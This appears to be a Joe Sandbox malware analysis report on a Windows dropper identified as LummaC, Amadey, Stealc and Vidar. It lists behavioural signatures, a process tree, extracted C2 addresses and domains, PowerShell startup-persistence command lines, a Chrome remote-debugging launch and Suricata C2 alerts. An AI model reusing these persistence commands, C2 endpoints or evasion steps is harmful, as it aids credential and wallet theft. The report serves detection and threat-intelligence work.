Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1553725
MD5:fe83cbc9270910772b2028f38444bb7f
SHA1:b9a3fd9e948b88a25c4c588c6e01fb3bd129902b
SHA256:d541c198374d012b7c58b1231b78818194dda9f43e8758df7b2a2e723f97b86b
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Powershell create lnk in startup
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Powershell creates an autostart link
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FE83CBC9270910772B2028F38444BB7F)
    • chrome.exe (PID: 7552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2348,i,5535902685194765974,17004954160592938984,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • cmd.exe (PID: 1732 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDGHCBAAEHC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DocumentsDGHCBAAEHC.exe (PID: 8048 cmdline: "C:\Users\user\DocumentsDGHCBAAEHC.exe" MD5: 219DA011BAD6CA9985808A7B2EF7C533)
        • skotes.exe (PID: 7996 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 219DA011BAD6CA9985808A7B2EF7C533)
  • skotes.exe (PID: 7692 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 219DA011BAD6CA9985808A7B2EF7C533)
    • pidgeon.exe (PID: 7240 cmdline: "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" MD5: 27DA32557EF397101BD519D5A3E00180)
      • powershell.exe (PID: 1308 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • crypted.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe" MD5: 1DA8B17CBBAEC15188A82B2339A7977F)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypted.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe" MD5: 1DA8B17CBBAEC15188A82B2339A7977F)
      • crypted.exe (PID: 4248 cmdline: "C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe" MD5: 1DA8B17CBBAEC15188A82B2339A7977F)
      • WerFault.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • c61fcc859d.exe (PID: 7024 cmdline: "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe" MD5: FAD8A273ED15C30E16C4BA0C776A9727)
    • 309de20225.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe" MD5: FE83CBC9270910772B2028F38444BB7F)
    • skotes.exe (PID: 8024 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 219DA011BAD6CA9985808A7B2EF7C533)
    • c2bb02869b.exe (PID: 1640 cmdline: "C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe" MD5: 247F995931CCF613FE7C4DF0FC6DBAF0)
  • pidgeon.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" MD5: 27DA32557EF397101BD519D5A3E00180)
    • powershell.exe (PID: 8176 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • c61fcc859d.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe" MD5: FAD8A273ED15C30E16C4BA0C776A9727)
  • 309de20225.exe (PID: 3604 cmdline: "C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe" MD5: FE83CBC9270910772B2028F38444BB7F)
  • c2bb02869b.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe" MD5: 247F995931CCF613FE7C4DF0FC6DBAF0)
  • c61fcc859d.exe (PID: 6396 cmdline: "C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe" MD5: FAD8A273ED15C30E16C4BA0C776A9727)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["presticitpo.store", "thumbystriw.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "scriptyprefej.store", "necklacedmny.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000017.00000002.2794500824.0000000005E01000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000018.00000003.2560756290.0000000004E20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000000.00000003.1685179886.0000000004C50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                Click to see the 38 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                10.2.skotes.exe.2f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  9.2.DocumentsDGHCBAAEHC.exe.240000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c61fcc859d.exe
                    Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
                    Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1308, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", CommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe, ParentProcessId: 7240, ParentProcessName: pidgeon.exe, ProcessCommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", ProcessId: 1308, ProcessName: powershell.exe
                    Sigma detected: Browser Started with Remote Debugging
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7352, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7552, ProcessName: chrome.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c61fcc859d.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1308, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", CommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe, ParentProcessId: 7240, ParentProcessName: pidgeon.exe, ProcessCommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", ProcessId: 1308, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Powershell create lnk in startup
                    Source: Process startedAuthor: Joe Security: Data: Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", CommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe, ParentProcessId: 7240, ParentProcessName: pidgeon.exe, ProcessCommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()", ProcessId: 1308, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:16.779468+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449756TCP
                    2024-11-11T16:36:54.666618+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449763TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:21.444710+010020283713Unknown Traffic192.168.2.44994023.192.247.89443TCP
                    2024-11-11T16:37:24.476049+010020283713Unknown Traffic192.168.2.44997123.192.247.89443TCP
                    2024-11-11T16:37:25.477188+010020283713Unknown Traffic192.168.2.449982188.114.96.3443TCP
                    2024-11-11T16:37:26.464674+010020283713Unknown Traffic192.168.2.449988188.114.96.3443TCP
                    2024-11-11T16:37:28.043561+010020283713Unknown Traffic192.168.2.450003188.114.96.3443TCP
                    2024-11-11T16:37:29.656585+010020283713Unknown Traffic192.168.2.450015188.114.96.3443TCP
                    2024-11-11T16:37:30.920055+010020283713Unknown Traffic192.168.2.450028188.114.96.3443TCP
                    2024-11-11T16:37:32.784785+010020283713Unknown Traffic192.168.2.450044188.114.96.3443TCP
                    2024-11-11T16:37:35.518093+010020283713Unknown Traffic192.168.2.450059188.114.96.3443TCP
                    2024-11-11T16:37:38.276696+010020283713Unknown Traffic192.168.2.450061188.114.96.3443TCP
                    2024-11-11T16:37:43.731176+010020283713Unknown Traffic192.168.2.45006623.192.247.89443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:25.971041+010020546531A Network Trojan was detected192.168.2.449982188.114.96.3443TCP
                    2024-11-11T16:37:27.118954+010020546531A Network Trojan was detected192.168.2.449988188.114.96.3443TCP
                    2024-11-11T16:37:38.654677+010020546531A Network Trojan was detected192.168.2.450061188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:25.971041+010020498361A Network Trojan was detected192.168.2.449982188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:27.118954+010020498121A Network Trojan was detected192.168.2.449988188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:18.749368+010020446961A Network Trojan was detected192.168.2.449923185.215.113.4380TCP
                    2024-11-11T16:37:23.751524+010020446961A Network Trojan was detected192.168.2.449963185.215.113.4380TCP
                    2024-11-11T16:37:28.161316+010020446961A Network Trojan was detected192.168.2.450001185.215.113.4380TCP
                    2024-11-11T16:37:32.072986+010020446961A Network Trojan was detected192.168.2.450036185.215.113.4380TCP
                    2024-11-11T16:37:36.871460+010020446961A Network Trojan was detected192.168.2.450060185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.566312+010020571291Domain Observed Used for C2 Detected192.168.2.4561711.1.1.153UDP
                    2024-11-11T16:37:42.747594+010020571291Domain Observed Used for C2 Detected192.168.2.4603701.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.589654+010020571271Domain Observed Used for C2 Detected192.168.2.4529081.1.1.153UDP
                    2024-11-11T16:37:42.772371+010020571271Domain Observed Used for C2 Detected192.168.2.4548031.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.730747+010020571211Domain Observed Used for C2 Detected192.168.2.4559941.1.1.153UDP
                    2024-11-11T16:37:42.876900+010020571211Domain Observed Used for C2 Detected192.168.2.4611591.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.756481+010020571191Domain Observed Used for C2 Detected192.168.2.4560631.1.1.153UDP
                    2024-11-11T16:37:42.900979+010020571191Domain Observed Used for C2 Detected192.168.2.4632281.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.699465+010020571231Domain Observed Used for C2 Detected192.168.2.4540591.1.1.153UDP
                    2024-11-11T16:37:42.851688+010020571231Domain Observed Used for C2 Detected192.168.2.4624791.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.537879+010020571311Domain Observed Used for C2 Detected192.168.2.4526671.1.1.153UDP
                    2024-11-11T16:37:42.716645+010020571311Domain Observed Used for C2 Detected192.168.2.4595571.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.783339+010020571011Domain Observed Used for C2 Detected192.168.2.4633001.1.1.153UDP
                    2024-11-11T16:37:42.925014+010020571011Domain Observed Used for C2 Detected192.168.2.4624561.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:23.630836+010020571251Domain Observed Used for C2 Detected192.168.2.4646641.1.1.153UDP
                    2024-11-11T16:37:42.797591+010020571251Domain Observed Used for C2 Detected192.168.2.4544011.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:02.081235+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.449730TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:02.074655+010020442441Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:02.278799+010020442461Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:03.216769+010020442481Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:02.285434+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.449730TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:33.158987+010020480941Malware Command and Control Activity Detected192.168.2.450044188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:01.871013+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP
                    2024-11-11T16:37:30.917209+010020442431Malware Command and Control Activity Detected192.168.2.450023185.215.113.20680TCP
                    2024-11-11T16:37:46.355392+010020442431Malware Command and Control Activity Detected192.168.2.450074185.215.113.20680TCP
                    2024-11-11T16:37:53.851468+010020442431Malware Command and Control Activity Detected192.168.2.450092185.215.113.20680TCP
                    2024-11-11T16:38:14.199428+010020442431Malware Command and Control Activity Detected192.168.2.450123185.215.113.20680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:14.252962+010028561211A Network Trojan was detected192.168.2.449887185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:06.411212+010028561471A Network Trojan was detected192.168.2.449829185.215.113.4380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:13.611687+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449845TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:09.174630+010028033053Unknown Traffic192.168.2.44985187.120.125.25480TCP
                    2024-11-11T16:37:14.908802+010028033053Unknown Traffic192.168.2.44989331.41.244.1180TCP
                    2024-11-11T16:37:19.416579+010028033053Unknown Traffic192.168.2.449929185.215.113.1680TCP
                    2024-11-11T16:37:24.406686+010028033053Unknown Traffic192.168.2.449970185.215.113.1680TCP
                    2024-11-11T16:37:32.725785+010028033053Unknown Traffic192.168.2.450043185.215.113.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:36:03.961913+010028033043Unknown Traffic192.168.2.449730185.215.113.20680TCP
                    2024-11-11T16:36:16.046963+010028033043Unknown Traffic192.168.2.449753185.215.113.20680TCP
                    2024-11-11T16:36:16.875047+010028033043Unknown Traffic192.168.2.449753185.215.113.20680TCP
                    2024-11-11T16:36:17.294705+010028033043Unknown Traffic192.168.2.449753185.215.113.20680TCP
                    2024-11-11T16:36:17.571881+010028033043Unknown Traffic192.168.2.449753185.215.113.20680TCP
                    2024-11-11T16:36:18.073327+010028033043Unknown Traffic192.168.2.449753185.215.113.20680TCP
